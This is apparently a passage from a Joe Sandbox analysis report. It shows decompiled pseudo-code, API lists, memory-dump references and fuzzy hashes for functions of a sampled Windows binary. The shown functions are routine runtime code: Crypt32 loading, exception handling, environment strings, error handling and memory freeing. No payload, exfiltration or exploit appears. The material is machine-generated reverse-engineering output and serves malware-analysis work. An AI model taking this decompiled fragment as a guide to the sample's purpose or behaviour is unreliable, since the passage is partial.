                • Opcode Fuzzy Hash: 5a1a70117a23906d00f5a03b02c8a1449a1da3849203c5b4802a5bb2c884ce55
                • Instruction Fuzzy Hash: F2F06D3150111CBBDB119F95DD09BAEBFB8EF44715F0141BAF905B2150DB745E50C658
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DF2C5(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E003E081B(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                0x003df2c6
                0x003df2cc
                0x003df2d3
                0x003df2d8
                0x003df2dc
                0x003df2f1
                0x003df2f4
                0x003df2fa
                0x003df2fa
                0x003df2fd
                0x00000000
                0x003df2fd
                0x003df302

                APIs
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003DF2E4
                • GetProcAddress.KERNEL32(004181C8,CryptUnprotectMemory), ref: 003DF2F4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: 0201dee8deabda680608598d30084317eb7486c77e5799294050215d92615140
                • Instruction ID: 78ce679eb69fa7f179f13813cfad852821b3c93a5487a748a1235c6d4271cbd7
                • Opcode Fuzzy Hash: 0201dee8deabda680608598d30084317eb7486c77e5799294050215d92615140
                • Instruction Fuzzy Hash: ADE0DF31A00701AEC7219F35A84CB017ED86F04705B20883FE0CAB3680C6B8D0808B04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 63%
                			E003F2BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed char _t81;
				signed char _t84;
				signed int _t85;
				signed int _t86;
				signed int _t97;
				signed char _t99;
				signed int* _t100;
				signed char* _t103;
				signed int _t109;
				void* _t113;

				_push(0x10);
				_push(0x40c248);
				E003EF5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t113 + 0x10);
				_t81 = _t52[4];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t99 = _t52[8];
					if(_t99 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t109 =  *(_t113 + 0xc);
						if(_t84 >= 0) {
							_t109 = _t109 + 0xc + _t99;
						}
						 *(_t113 - 4) = _t75;
						_t103 =  *(_t113 + 0x14);
						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t113 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t103 & 0x00000001;
								if(( *_t103 & 0x00000001) == 0) {
									_t85 =  *(_t54 + 0x18);
									__eflags = _t103[0x18] - _t75;
									if(_t103[0x18] != _t75) {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												__eflags =  *_t103 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t113 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												E003F0320(_t109, E003F027C(_t85,  &(_t103[8])), _t103[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t109;
										if(_t109 == 0) {
											goto L32;
										} else {
											E003F0320(_t109,  *(_t54 + 0x18), _t103[0x14]);
											__eflags = _t103[0x14] - 4;
											if(_t103[0x14] == 4) {
												__eflags =  *_t109;
												if( *_t109 != 0) {
													_push( &(_t103[8]));
													_push( *_t109);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t97 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x43205c; // 0x0
							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x403278();
								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
								L12:
								if(_t97 == 0 || _t109 == 0) {
									L32:
									E003F8D24(_t75, _t99, _t103, _t109);
									asm("int3");
									_push(8);
									_push(0x40c268);
									E003EF5F0(_t75, _t103, _t109);
									_t100 =  *(_t113 + 0x10);
									_t86 =  *(_t113 + 0xc);
									__eflags =  *_t100;
									if(__eflags >= 0) {
										_t105 = _t86 + 0xc + _t100[2];
										__eflags = _t86 + 0xc + _t100[2];
									} else {
										_t105 = _t86;
									}
									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
									_t110 =  *(_t113 + 0x14);
									_push( *(_t113 + 0x14));
									_push(_t100);
									_push(_t86);
									_t77 =  *((intOrPtr*)(_t113 + 8));
									_push( *((intOrPtr*)(_t113 + 8)));
									_t58 = E003F2BDA(_t77, _t105, _t110, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E003F38E4(_t105, _t110[0x18], E003F027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E003F38F4(_t105, _t110[0x18], E003F027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
										}
									}
									 *(_t113 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t61;
								} else {
									 *_t109 = _t97;
									_push( &(_t103[8]));
									_push(_t97);
									L21:
									 *_t109 = E003F027C();
									L29:
									 *(_t113 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}





















                0x003f2bda
                0x003f2bdc
                0x003f2be1
                0x003f2be6
                0x003f2be8
                0x003f2beb
                0x003f2bf0
                0x003f2d00
                0x003f2d00
                0x003f2d00
                0x00000000
                0x003f2bff
                0x003f2bff
                0x003f2c04
                0x003f2c0e
                0x003f2c10
                0x003f2c15
                0x003f2c1a
                0x003f2c1a
                0x003f2c1c
                0x003f2c1f
                0x003f2c24
                0x003f2c46
                0x003f2c46
                0x003f2c49
                0x003f2c4c
                0x003f2c6a
                0x003f2c6d
                0x003f2cac
                0x003f2caf
                0x003f2cb2
                0x003f2cd7
                0x003f2cd9
                0x00000000
                0x003f2cdb
                0x003f2cdb
                0x003f2cdd
                0x00000000
                0x003f2cdf
                0x003f2cdf
                0x003f2ce4
                0x003f2ce8
                0x003f2ce8
                0x003f2ce9
                0x00000000
                0x003f2ce9
                0x003f2cdd
                0x003f2cb4
                0x003f2cb4
                0x003f2cb6
                0x00000000
                0x003f2cb8
                0x003f2cb8
                0x003f2cba
                0x00000000
                0x003f2cbc
                0x003f2ccd
                0x00000000
                0x003f2cd2
                0x003f2cba
                0x003f2cb6
                0x003f2c6f
                0x003f2c6f
                0x003f2c73
                0x00000000
                0x003f2c79
                0x003f2c79
                0x003f2c7b
                0x00000000
                0x003f2c81
                0x003f2c88
                0x003f2c90
                0x003f2c94
                0x003f2c96
                0x003f2c99
                0x003f2c9e
                0x003f2c9f
                0x00000000
                0x003f2c9f
                0x003f2c99
                0x00000000
                0x003f2c94
                0x003f2c7b
                0x003f2c73
                0x003f2c4e
                0x003f2c4e
                0x00000000
                0x003f2c4e
                0x003f2c2b
                0x003f2c2b
                0x003f2c30
                0x003f2c35
                0x00000000
                0x003f2c37
                0x003f2c39
                0x003f2c42
                0x003f2c51
                0x003f2c53
                0x003f2d12
                0x003f2d12
                0x003f2d17
                0x003f2d18
                0x003f2d1a
                0x003f2d1f
                0x003f2d24
                0x003f2d27
                0x003f2d2a
                0x003f2d2d
                0x003f2d36
                0x003f2d36
                0x003f2d2f
                0x003f2d2f
                0x003f2d2f
                0x003f2d39
                0x003f2d3d
                0x003f2d40
                0x003f2d41
                0x003f2d42
                0x003f2d43
                0x003f2d46
                0x003f2d4f
                0x003f2d4f
                0x003f2d52
                0x003f2d88
                0x003f2d54
                0x003f2d54
                0x003f2d54
                0x003f2d57
                0x003f2d6e
                0x003f2d6e
                0x003f2d57
                0x003f2d8d
                0x003f2d97
                0x003f2da3
                0x003f2c61
                0x003f2c61
                0x003f2c66
                0x003f2c67
                0x003f2ca1
                0x003f2ca8
                0x003f2cec
                0x003f2cec
                0x003f2cf3
                0x003f2d02
                0x003f2d05
                0x003f2d11
                0x003f2d11
                0x003f2c53
                0x003f2c35
                0x00000000
                0x00000000
                0x00000000
                0x003f2c04

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AdjustPointer$_abort
                • String ID:
                • API String ID: 2252061734-0
                • Opcode ID: 3f1226d03eaacf1d03afcdc8cb5d09a9fb948b53528cb860c46767c45922141c
                • Instruction ID: 15717d9b79084b314cdebae70d150d393073211d0bfa252fd9a4475131ae014a
                • Opcode Fuzzy Hash: 3f1226d03eaacf1d03afcdc8cb5d09a9fb948b53528cb860c46767c45922141c
                • Instruction Fuzzy Hash: 7A51CE7260121AEFEB2A8F18D845BBB77A4FF54310F25452DFA124B6A1D731ED80D790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E003FBF30() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E003FBEF9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E003F8E06(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E003F8DCC(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                0x003fbf3f
                0x003fbf45
                0x003fbf9d
                0x003fbf9d
                0x003fbf47
                0x003fbf48
                0x003fbf4d
                0x003fbf56
                0x003fbf5c
                0x003fbf62
                0x003fbf67
                0x00000000
                0x003fbf69
                0x003fbf6f
                0x003fbf74
                0x003fbf92
                0x003fbf8c
                0x003fbf8c
                0x003fbf8e
                0x003fbf8e
                0x003fbf95
                0x003fbf9a
                0x003fbf67
                0x003fbfa1
                0x003fbfa4
                0x003fbfa4
                0x003fbfb2

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 003FBF39
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FBF5C
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003FBF82
                • _free.LIBCMT ref: 003FBF95
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003FBFA4
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 7ebdf8640dddee6fad917b6b917c21e65c216bf45abe2729fa0e7eb4290be1dd
                • Instruction ID: 96c69cb67ba2386ce827dab8eee613ea9d2a48d17f2b1c0500fc32a44d1a2eb8
                • Opcode Fuzzy Hash: 7ebdf8640dddee6fad917b6b917c21e65c216bf45abe2729fa0e7eb4290be1dd
                • Instruction Fuzzy Hash: 3D01A7F26057197FA3221A769C4DC7BEE6DDEC6BA13150129FB04DA141EF70CD0195B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 82%
                			E003F9869(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				long _t18;

				_t11 = __ecx;
				_t18 = GetLastError();
				_t10 = 0;
				_t2 =  *0x40e7fc; // 0x6
				_t21 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t17 = E003FB136(_t11, 1, 0x364);
					_pop(_t13);
					if(_t17 != 0) {
						_t4 = E003FAEB1(_t10, _t13, _t17, __eflags,  *0x40e7fc, _t17);
						__eflags = _t4;
						if(_t4 != 0) {
							E003F9649(_t13, _t17, 0x432288);
							E003F8DCC(_t10);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t17);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E003F8DCC();
						L8:
						SetLastError(_t18);
					}
				} else {
					_t17 = E003FAE5B(0, _t11, _t16, _t21, _t2);
					if(_t17 != 0) {
						L9:
						SetLastError(_t18);
						_t10 = _t17;
					} else {
						goto L2;
					}
				}
				return _t10;
			}













                0x003f9869
                0x003f9874
                0x003f9876
                0x003f9878
                0x003f987d
                0x003f9880
                0x003f988e
                0x003f989a
                0x003f989d
                0x003f98a0
                0x003f98b2
                0x003f98b7
                0x003f98b9
                0x003f98c4
                0x003f98ca
                0x003f98d2
                0x003f98d4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f98bb
                0x003f98bb
                0x00000000
                0x003f98bb
                0x003f98a2
                0x003f98a2
                0x003f98a3
                0x003f98a3
                0x003f98d6
                0x003f98d7
                0x003f98d7
                0x003f9882
                0x003f9888
                0x003f988c
                0x003f98df
                0x003f98e0
                0x003f98e6
                0x00000000
                0x00000000
                0x00000000
                0x003f988c
                0x003f98ed

                APIs
                • GetLastError.KERNEL32(?,?,?,003F91AD,003FB188,?,003F9813,00000001,00000364,?,003F40EF,?,?,00411098), ref: 003F986E
                • _free.LIBCMT ref: 003F98A3
                • _free.LIBCMT ref: 003F98CA
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F98D7
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F98E0
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 894c4e8be4d59ce64509124840ddc5b9dbfb1aa14d6701053dd8215f6304a25a
                • Instruction ID: a24903abfb48ac0629656bbfc4b633773f8c4711c1e64ee147703b3910ac95ac
                • Opcode Fuzzy Hash: 894c4e8be4d59ce64509124840ddc5b9dbfb1aa14d6701053dd8215f6304a25a
                • Instruction Fuzzy Hash: E301F43614560D6BC3132766AE85B3B296DDFD37F5B220137F715A6292EE308C015129
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E003E0EED(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				long* _t20;
				void** _t26;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(0x402641);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E003E11CF(__ecx);
				_t20 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t26 = _t28 + 4;
					do {
						E003E0FE4(_t22, _t30,  *_t26);
						CloseHandle( *_t26);
						_t20 = _t20 + 1;
						_t26 =  &(_t26[1]);
					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                0x003e0eed
                0x003e0ef6
                0x003e0ef8
                0x003e0efd
                0x003e0efe
                0x003e0f08
                0x003e0f0a
                0x003e0f0f
                0x003e0f11
                0x003e0f21
                0x003e0f2d
                0x003e0f2f
                0x003e0f32
                0x003e0f34
                0x003e0f3b
                0x003e0f41
                0x003e0f42
                0x003e0f45
                0x003e0f32
                0x003e0f54
                0x003e0f60
                0x003e0f6c
                0x003e0f77
                0x003e0f80

                APIs
                  • Part of subcall function 003E11CF: ResetEvent.KERNEL32(?), ref: 003E11E1
                  • Part of subcall function 003E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003E11F5
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 003E0F21
                • CloseHandle.KERNEL32(?,?), ref: 003E0F3B
                • DeleteCriticalSection.KERNEL32(?), ref: 003E0F54
                • CloseHandle.KERNEL32(?), ref: 003E0F60
                • CloseHandle.KERNEL32(?), ref: 003E0F6C
                  • Part of subcall function 003E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,003E1101,?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FEA
                  • Part of subcall function 003E0FE4: GetLastError.KERNEL32(?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FF6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 40a766e0cb9190090e47a15a2a7554dfd0593d5f84954d230b3d970905d37669
                • Instruction ID: c7d703ae0067303e2f8145db4ce573538a6cc909600b0b711d1d2dd1ec71601f
                • Opcode Fuzzy Hash: 40a766e0cb9190090e47a15a2a7554dfd0593d5f84954d230b3d970905d37669
                • Instruction Fuzzy Hash: 5A019271000740EFC7229F65DD84BC6BBADFB08711F004929F15A621A0C7B57A55CA54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E003FC7FF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x40eea0; // 0x40ee94
					if(_t23 != 0) {
						E003F8DCC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x40eea4; // 0x4326fc
					if(_t24 != 0) {
						E003F8DCC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x40eea8; // 0x4326fc
					if(_t25 != 0) {
						E003F8DCC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x40eed0; // 0x40ee98
					if(_t26 != 0) {
						E003F8DCC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x40eed4; // 0x432700
					if(_t27 != 0) {
						return E003F8DCC(_t6);
					}
				}
				return _t6;
			}










                0x003fc805
                0x003fc80a
                0x003fc80e
                0x003fc814
                0x003fc817
                0x003fc81c
                0x003fc820
                0x003fc826
                0x003fc829
                0x003fc82e
                0x003fc832
                0x003fc838
                0x003fc83b
                0x003fc840
                0x003fc844
                0x003fc84a
                0x003fc84d
                0x003fc852
                0x003fc853
                0x003fc856
                0x003fc85c
                0x00000000
                0x003fc864
                0x003fc85c
                0x003fc867

                APIs
                • _free.LIBCMT ref: 003FC817
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FC829
                • _free.LIBCMT ref: 003FC83B
                • _free.LIBCMT ref: 003FC84D
                • _free.LIBCMT ref: 003FC85F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 810c952dbb74e0fcfe9066969cd29790990fc87def3c71082ab3ef176aa5b31c
                • Instruction ID: ea28f2095b26090a9ac5c8f911663852de441598205b24d5e81cda2419a3f43c
                • Opcode Fuzzy Hash: 810c952dbb74e0fcfe9066969cd29790990fc87def3c71082ab3ef176aa5b31c
                • Instruction Fuzzy Hash: 50F0623255420CABC726DB69E685C2673E9AE007907592C29F308EB592CB74FC80CA94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003E1FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t10;
				int _t22;
				int _t23;

				_t10 = E003F3E13(_a4);
				_t23 = _a12;
				if(_t10 + 1 >= _t23) {
					_t22 = _t23;
				} else {
					_t4 = E003F3E13(_a4) + 1; // 0x1
					_t22 = _t4;
				}
				if(E003F3E13(_a8) + 1 < _t23) {
					_t7 = E003F3E13(_a8) + 1; // 0x1
					_t23 = _t7;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
			}






                0x003e1fe5
                0x003e1fea
                0x003e1ff1
                0x003e2001
                0x003e1ff3
                0x003e1ffc
                0x003e1ffc
                0x003e1ffc
                0x003e200f
                0x003e201a
                0x003e201a
                0x003e201a
                0x003e203b

                APIs
                • _wcslen.LIBCMT ref: 003E1FE5
                • _wcslen.LIBCMT ref: 003E1FF6
                • _wcslen.LIBCMT ref: 003E2006
                • _wcslen.LIBCMT ref: 003E2014
                • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,003DB371,?,?,00000000,?,?,?), ref: 003E202F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CompareString
                • String ID:
                • API String ID: 3397213944-0
                • Opcode ID: 19027c9b4b4258a5aaf94fd687e2b6aa21911f82b9db5f95cd99bfc9de10693e
                • Instruction ID: d1d59431018dd3e8daab683da3bee09d431521f07104cf1f5ebf78bda12d9aaa
                • Opcode Fuzzy Hash: 19027c9b4b4258a5aaf94fd687e2b6aa21911f82b9db5f95cd99bfc9de10693e
